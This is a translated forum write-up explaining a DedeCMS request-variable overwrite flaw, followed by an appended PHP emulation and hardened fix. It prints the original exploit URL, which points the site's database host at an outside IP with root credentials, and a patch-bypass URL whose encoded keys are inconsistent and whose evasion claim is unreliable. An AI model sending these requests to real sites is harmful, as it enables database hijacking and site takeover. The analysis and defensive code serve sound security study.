Whether or not you can write an article doesn't matter; first of all, the title has to match the big shots'!
Author: a flower from a single crush. Originally posted on t00ls; please credit the source when reprinting. If there are any similarities, it is purely because others plagiarized. Hey hey!
I. Preface
This evening I missed my wife and couldn't sleep, so I went to t00ls to find my friends. I was surprised to see that a dedecms vulnerability had been dropped, and I couldn't help but report on it. I could see that some kids on the forum are still puzzling over the cause of the vulnerability. I'm a noob, but I know a little php, so I came here to show my clumsy work; please don't flame me, everyone!
II. Some PHP behaviour
When PHP applications handle user-submitted data, the following points deserve attention:
1. $GLOBALS is a global array through which variables can be accessed by name.
2. If register_globals is enabled, php registers the $_REQUEST array, that is, the user's request parameters, as global variables.
3. php places specific http request headers in the $_SERVER array.
4. Input parameters whose names contain subscripts (square brackets) are converted into arrays, and this is the cause of the vulnerability!
The first three items are just my own summary and may be incomplete; I hope you can add to them. Some kids may not be very familiar with the fourth item, so let me give a simple example! Look at the code:
<?php
print_r($_GET);
?>
Request http://www.bkjia.com/test.php?test[dan]=1&test[lian]=2 directly and the output is Array ( [test] => Array ( [dan] => 1 [lian] => 2 ) ). In other words, an array is nested inside the $_GET array, which has become a two-dimensional array!
III. Analysis of dede
Based on the above, let's analyze dede. First, let's look at the exp given by the author: login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. Now look at the vulnerable file \include\common.inc.php, line 22:
foreach ($_REQUEST as $_k => $_v)
{
    if (strlen($_k) > 0 && eregi('^(cfg_|GLOBALS)', $_k))
    {
        exit('request var not allow!');
    }
}
The $_REQUEST array is not filtered for the GLOBALS keyword (refer to item 1 in the php section above); the code only checks whether a key was submitted and whether it starts with the prefix cfg_ or GLOBALS. So in this first traversal the $_k of our $_REQUEST is _POST, which passes the check, and we move on to line 47:
foreach (Array('_GET', '_POST', '_COOKIE') as $_request)
{
    foreach ($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
When $_GET is registered, the $_k of $_GET is _POST, so $_POST is overwritten with our nested array. When $_POST is then traversed, its $_k is GLOBALS, so GLOBALS is registered,
and the elements cfg_dbhost, cfg_dbuser, cfg_dbpwd and cfg_dbname in that array are assigned values, which leads to the vulnerability!
IV. Bypassing the vulnerability patch
I saw a temporary patch on a blog:
foreach (Array('_GET', '_POST', '_COOKIE') as $_request)
{
    foreach ($$_request as $_k => $_v) {
        if (strlen($_k) > 0 && eregi('^(cfg_|GLOBALS)', $_k)) {
            exit('request var not allow!');
        }
        ${$_k} = _RunMagicQuotes($_v);
    }
}
When $_POST is traversed, if $_k contains the GLOBALS keyword the script exits. We can convert GLOBALS to hexadecimal to bypass it:
login.php?dopost=login&validate=dcug&userid=admin&pwd=admin&_POST[login][cfg_dbhost]=www.2cto.com&_POST[0x474c4f1_14c53][cfg_dbuser]=root&_POST[0x474c4f000014c53][cfg_dbpwd]=&_POST[0x474c4f000014c53][cfg_dbname]=dedecmsv55gbk
My local test was successful. If you are interested, you can test it yourself!
I have also posted it on my blog. Hey, if you are interested, please visit my Baidu blog!
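To make the chain in sections II to IV concrete, here is an added example; it is not code from DedeCMS or from the original post. It models the global symbol table as a plain array, so it runs on PHP 7 and 8 without ever assigning to the real $GLOBALS (which PHP 8.1+ forbids), feeds it a constructed query string of the same shape as the exp in section III, and then shows a hardened registration routine beside the vulnerable one. The function and variable names (emulate_global_assign, register_vulnerable, register_hardened, fresh_globals) and the placeholder host attacker.invalid are assumptions made for this example.

```php
<?php
// Added example, not DedeCMS code. The global symbol table is modelled as a
// plain array so that nothing here assigns to the real $GLOBALS (PHP 8.1+
// forbids that). All names below are assumptions made for this example.

// Emulates `${$k} = $v` against the modelled global table. In PHP 5, assigning
// an array to the name GLOBALS merged its elements into the global table,
// which is what let cfg_dbhost be overwritten; that is the behaviour modelled.
function emulate_global_assign(array &$globals, string $k, $v): void
{
    if ($k === 'GLOBALS' && is_array($v)) {
        foreach ($v as $name => $value) {
            $globals[$name] = $value;
        }
        return;
    }
    $globals[$k] = $v;
}

// The vulnerable pattern from common.inc.php: one prefix check on the
// top-level keys of _REQUEST, then blind registration of every key in _GET
// and _POST. The key '_POST' passes the check, so the first pass replaces the
// _POST array and the second pass registers the nested GLOBALS array.
function register_vulnerable(array &$globals): void
{
    foreach ($globals['_REQUEST'] as $k => $v) {
        if (preg_match('/^(cfg_|GLOBALS)/i', (string)$k)) {
            throw new RuntimeException('request var not allow!');
        }
    }
    foreach (['_GET', '_POST'] as $source) {
        foreach ($globals[$source] as $k => $v) {
            emulate_global_assign($globals, (string)$k, $v);
        }
    }
}

// Hardened replacement: never use a request key as a variable name. Copy only
// an explicit allowlist of scalar parameters, and reject the whole request if
// any key at any depth names a superglobal, GLOBALS, or a cfg_ setting.
// Returns the list of offending key paths (empty when the request is clean).
function register_hardened(array &$globals, array $allowlist): array
{
    $reserved = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                 '_SERVER', '_ENV', '_FILES', '_SESSION'];
    $rejected = [];
    $walk = function (array $arr, string $path) use (&$walk, &$rejected, $reserved): void {
        foreach ($arr as $k => $v) {
            $key  = (string)$k;
            $full = $path . '[' . $key . ']';
            if (in_array(strtoupper($key), $reserved, true) || stripos($key, 'cfg_') === 0) {
                $rejected[] = $full;
            }
            if (is_array($v)) {
                $walk($v, $full);
            }
        }
    };
    foreach (['_GET', '_POST'] as $source) {
        $walk($globals[$source], $source);
    }
    if ($rejected !== []) {
        return $rejected;                // register nothing from a tainted request
    }
    foreach ($allowlist as $name) {
        foreach (['_GET', '_POST'] as $source) {
            if (isset($globals[$source][$name]) && is_scalar($globals[$source][$name])) {
                $globals[$name] = $globals[$source][$name];
            }
        }
    }
    return [];
}

// Builds a fresh modelled global table from a constructed query string. The
// host is a placeholder; the shape matches the exp discussed in section III.
function fresh_globals(string $query): array
{
    $globals = ['cfg_dbhost' => 'localhost', '_GET' => [], '_POST' => [], '_REQUEST' => []];
    parse_str($query, $globals['_GET']);      // section II: a[b][c]=1 becomes a nested array
    $globals['_REQUEST'] = $globals['_GET'];
    return $globals;
}

$query = 'dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=attacker.invalid';

$g = fresh_globals($query);
register_vulnerable($g);
echo "vulnerable path: cfg_dbhost = {$g['cfg_dbhost']}\n";

$g = fresh_globals($query);
$rejected = register_hardened($g, ['dopost', 'userid']);
echo "hardened path:   cfg_dbhost = {$g['cfg_dbhost']}\n";
echo "rejected keys:   " . implode(', ', $rejected) . "\n";
```

Run it with php from the command line. The hardened routine rejects the request on the `_POST` key itself, so what the nested key underneath it looks like (GLOBALS spelled out or encoded some other way) never matters, and because only allowlisted scalar names are ever copied into the global table, cfg_dbhost keeps its configured value. That is the difference from the temporary patch in section IV, which still lets a request key choose the variable name and only pattern-matches that key.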